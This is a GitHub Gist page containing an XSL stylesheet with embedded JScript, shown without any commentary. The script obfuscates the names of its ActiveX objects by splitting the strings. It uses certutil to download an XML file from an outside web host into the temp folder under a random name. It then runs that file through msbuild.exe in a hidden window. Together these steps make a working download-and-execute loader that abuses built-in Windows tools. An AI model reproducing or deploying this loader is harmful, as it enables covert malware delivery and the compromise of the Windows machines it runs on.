Last active
May 1, 2018 12:19
-
-
Save iam1980/42a04dbf6f9251de0c1a845a02659258 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version='1.0'?> | |
<stylesheet | |
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
xmlns:user="placeholder" | |
version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
function i() { | |
var a = ""; | |
var p = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; | |
for (var i = 0; i < 5; i++) | |
a += p.charAt(Math.floor(Math.random() * p.length)); | |
return a; | |
} | |
var fdsafdsa = new ActiveXObject(("WS"+"cr"+"ipt.Sh"+"el"+"l")); | |
sf = new ActiveXObject(("Scr"+"ip"+"ting.Fi"+"le"+"Sys"+"temObje"+"ct")); | |
tm = sf.GetSpecialFolder(2); | |
var ii = i(); | |
fdsafdsa.Run(("certutil -urlcache -split -f https://www.evo-designs.net/ir.xml?lrt=18547 "+tm+"\\"+ii+".xml"), 0, true); | |
fdsafdsa.Run(("C:\\Win"+"dows\\Microsoft.N"+"ET\\Framework\\v"+"4.0.30319\\ms"+"bui"+"ld.exe "+tm+"\\"+ii+".xml"), 0, false); | |
]]> </ms:script> | |
</stylesheet> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment